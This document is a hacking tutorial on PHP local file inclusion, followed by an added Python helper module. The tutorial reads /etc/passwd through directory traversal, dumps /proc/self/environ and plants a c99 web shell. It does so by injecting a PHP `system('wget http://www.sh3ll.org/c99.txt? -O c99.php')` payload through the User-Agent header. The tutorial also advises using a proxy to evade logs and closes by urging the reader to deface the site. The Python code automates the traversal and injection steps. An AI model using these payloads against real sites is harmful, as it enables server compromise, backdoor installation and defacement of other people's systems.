- Topol's LFI and Shelling through proc/self/environ Tutorial
- ================================================================================================
- Part 1 - Finding a Vulnerable site
- Tip: There are several steps to confirming that a site is fully vulnerable, so work through them in order.
- Say you have a site like this: www.site.com/index.php?page=view.php
- The page= parameter is the suspect: index.php is most likely passing it straight into include() or require(). You can check for the first sign of the vulnerability by adding a ' or a ../ to the value.
- You should get some sort of error on the page. With display_errors on, PHP prints a warning like "include(): failed to open stream" that shows the full path it tried to open, which tells you whether the script prepends a directory or appends an extension (such as .php) to your input.
- Now we can attempt to read files outside the web root, using /etc/passwd as the test file (it exists on every Linux box and is world-readable).
- So we replace the "view.php" of the site with /etc/passwd like this:
- www.site.com/index.php?page=/etc/passwd
- If you get the same error as before, don't worry: the script is prepending a directory to your input, so keep going up the directory tree with ../ until you reach the root of the filesystem (extra ../ beyond the root are harmless, since /.. is still /):
- www.site.com/index.php?page=../etc/passwd
- www.site.com/index.php?page=../../etc/passwd
- www.site.com/index.php?page=../../../etc/passwd
- www.site.com/index.php?page=../../../../etc/passwd <-- Say we finally got it
- Now we should get something like this (one account per line):
- root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- news:x:9:13:news:/etc/news
- (Sometimes you will have to add a null byte. If the script appends .php to your input, the server tries to open /etc/passwd.php and fails; the %00 terminates the filename for the C library underneath PHP, so the appended .php is dropped:
- www.site.com/index.php?page=../../../../etc/passwd%00
- This only works on PHP older than 5.3.4 with magic_quotes_gpc off; newer versions refuse to open a path that contains a null byte.)
- ================================================================================================
- Part 2 - Getting the /proc/self/environ
- /proc/self/environ is the environment of whichever process opens it. When PHP runs as a CGI program, the web server hands it the request variables through that environment, so the file contains HTTP_USER_AGENT, HTTP_REFERER and HTTP_COOKIE copied straight from the headers you sent. That is what makes it more useful than /etc/passwd. (GATEWAY_INTERFACE=CGI/1.1 and REDIRECT_STATUS=200 in the dump are the sign of a CGI setup. With mod_php the file only shows Apache's own startup environment with no HTTP_* entries, and this technique does not apply.)
- We now replace the /etc/passwd with /proc/self/environ, keeping the same number of ../ (and the %00 if you needed it):
- www.site.com/index.php?page=../../../../proc/self/environ
- We should get something like this. The real file separates the variables with NUL bytes, which the browser does not display, so it appears as one run-together block. The capture below was taken from a site whose parameter is called view rather than page, which is why the URLs in it differ from the ones above:
- DOCUMENT_ROOT=/home/sirgod/public_html
- GATEWAY_INTERFACE=CGI/1.1
- HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
- HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
- HTTP_HOST=www.example.com
- HTTP_REFERER=http://www.site.com/index.php?view=../../../../etc/passwd
- HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
- PATH=/bin:/usr/bin
- QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
- REDIRECT_STATUS=200
- REMOTE_ADDR=6x.1xx.4x.1xx
- REMOTE_PORT=35665
- REQUEST_METHOD=GET
- REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
- SCRIPT_FILENAME=/home/sirgod/public_html/index.php
- SCRIPT_NAME=/index.php
- SERVER_ADDR=1xx.1xx.1xx.6x
- SERVER_ADMIN=webmaster@example.com
- SERVER_NAME=www.example.com
- SERVER_PORT=80
- SERVER_PROTOCOL=HTTP/1.0
- SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.site.com Port 80
- Congrats, you got the /proc/self/environ!
- ================================================================================================
- Part 3 - Shelling the site
- Now that you got your /proc/self/environ, you might be able to shell it.
- Why this works: the script is not just reading /proc/self/environ, it is include()ing it, so PHP parses the file and runs any <?php ... ?> block it finds. HTTP_USER_AGENT in that file is copied verbatim from the User-Agent header of your own request, so PHP placed in that header lands in the file and gets executed (HTTP_REFERER or HTTP_COOKIE would work the same way).
- Assuming that you use Firefox, you need a way to edit the request headers. This tutorial uses the Tamper Data add-on: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ (it was written for the old add-on API and does not work in current Firefox versions; any tool that lets you set a request header does the same job, for example curl with -A, or an intercepting proxy).
- Once it is installed, you can find it in the "Tools" section of the Firefox menu bar.
- Open Tamper Data on www.site.com/index.php?page=../../../../proc/self/environ and click "Start Tamper". (DO NOT GO TO ANY OTHER PAGE, or the request you tamper with will not be the one that loads /proc/self/environ.) Now refresh the page. It is going to give you 3 options. Click "Tamper".
- Now in the User-Agent field you put your PHP. For this we are going to use the c99 shell. Keep in mind that the web server's access log records every request, including the User-Agent header carrying your payload, and the dropped c99.php sits in plain view in the web root, so ALWAYS USE A PROXY/VPN. Put this in your User-Agent:
- <?php system('wget http://www.sh3ll.org/c99.txt? -O c99.php'); ?>
- Use the full <?php tag and plain single quotes: the short <? form only works when short_open_tag is enabled, and curly quotes are a syntax error. The shell is fetched as .txt so the hosting server serves it as text instead of executing it, and -O saves it as c99.php on the target.
- Now press OK. The page loads, wget runs as the web server user, and you can find your shell at www.site.com/c99.php
- If it is not there: wget writes into the working directory of the server process, which is usually the directory of the included script (the web root here), but that directory must be writable by the server user and wget must exist on the box. To be sure where the file lands, give -O an absolute path built from the DOCUMENT_ROOT value in the environ dump (/home/sirgod/public_html in the example).
- Congrats, now you can take over the site and deface it. Have fun!
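The three parts above as working Python helpers. This is an added example, not code from the tutorial: it builds the traversal candidates from Part 1, recognises /etc/passwd in a response, parses a /proc/self/environ dump to show which request headers the server copied into it (Part 2), and, as a swapped-in verification step that the tutorial does not use, generates a harmless PHP marker to confirm execution before any shell is dropped (Part 3). SAMPLE_ENVIRON is constructed from the values in the paste with the NUL separators restored; the host and parameter names are the tutorial's, and nothing here touches the network.

```python
"""Helpers for the three steps of the tutorial: build traversal candidates,
recognise /etc/passwd in a response, and parse a /proc/self/environ dump to see
which request headers end up inside it.  Added example; everything here is
offline and the sample environ is constructed from the values in the paste."""
import hashlib
import re
import secrets


def traversal_candidates(target, max_depth=8, null_byte=False):
    """page= values to try, from an absolute path up to max_depth levels of ../.
    Extra ../ beyond the real depth are harmless because /.. resolves to /.
    The %00 suffix only truncates the path on PHP < 5.3.4."""
    target = target.lstrip("/")
    suffix = "%00" if null_byte else ""
    out = ["/" + target + suffix]
    out += ["../" * depth + target + suffix for depth in range(1, max_depth + 1)]
    return out


def looks_like_passwd(body):
    """True when the response carries the root entry of /etc/passwd (uid 0, gid 0),
    whether the entries sit one per line or run together with spaces."""
    return re.search(r"(?:^|\s)root:[^:\s]*:0:0:", body) is not None


def parse_environ(raw):
    """Split the NUL-separated KEY=VALUE blob of /proc/self/environ into a dict.
    Browsers drop the NULs, which is why the tutorial's dump looks like one line."""
    env = {}
    for entry in raw.split(b"\x00"):
        if b"=" in entry:
            key, _, value = entry.partition(b"=")
            env[key.decode("latin-1")] = value.decode("latin-1")
    return env


def injectable_headers(env):
    """Request headers the server copied into its environment, i.e. the places a
    payload can be written.  Returns {env key: HTTP header name}.  An empty dict
    means the headers are not in the process environment (typical for mod_php)
    and the environ trick will not work on that target."""
    return {k: k[5:].replace("_", "-").title() for k in env if k.startswith("HTTP_")}


def marker_payload(nonce=None):
    """A harmless PHP marker to confirm execution before dropping a shell.
    Returns (payload, expected_output): if expected_output appears in the response
    the file was include()d and executed; if the raw payload appears instead it
    was only read back (readfile/file_get_contents) and nothing ran."""
    nonce = nonce or secrets.token_hex(8)
    expected = hashlib.md5(nonce.encode()).hexdigest()
    return f"<?php echo md5('{nonce}'); ?>", expected


def execution_status(body, payload, expected):
    """Classify a response to a request whose User-Agent carried `payload`."""
    if expected in body:
        return "executed"
    if payload in body:
        return "reflected"
    return "absent"


def curl_command(url, payload):
    """The Tamper Data step as a curl invocation: -A sets the User-Agent header."""
    return ["curl", "-s", "-A", payload, url]


# Constructed sample: the paste's environ values, re-joined with the NUL bytes
# the browser had stripped.
SAMPLE_ENVIRON = (
    b"DOCUMENT_ROOT=/home/sirgod/public_html\x00"
    b"GATEWAY_INTERFACE=CGI/1.1\x00"
    b"HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac\x00"
    b"HTTP_HOST=www.example.com\x00"
    b"HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00\x00"
    b"REQUEST_METHOD=GET\x00"
    b"SCRIPT_FILENAME=/home/sirgod/public_html/index.php\x00"
)

if __name__ == "__main__":
    base = "http://www.site.com/index.php?page="
    for candidate in traversal_candidates("/etc/passwd", max_depth=4):
        print("try:", base + candidate)
    env = parse_environ(SAMPLE_ENVIRON)
    print("CGI mode:", env.get("GATEWAY_INTERFACE") == "CGI/1.1")
    print("writable via headers:", injectable_headers(env))
    payload, expected = marker_payload()
    print(" ".join(curl_command(base + "../../../../proc/self/environ", payload)))
    print("look for", expected, "in the response before sending the real shell")
```

The marker step is the check a practitioner wants before Part 3: a response containing the md5 proves the include path is executing what you put in the header, a response containing the literal `<?php` text proves the file is only being read back, and no HTTP_* entries in the parsed environ means the headers never reach the process environment and no payload will run.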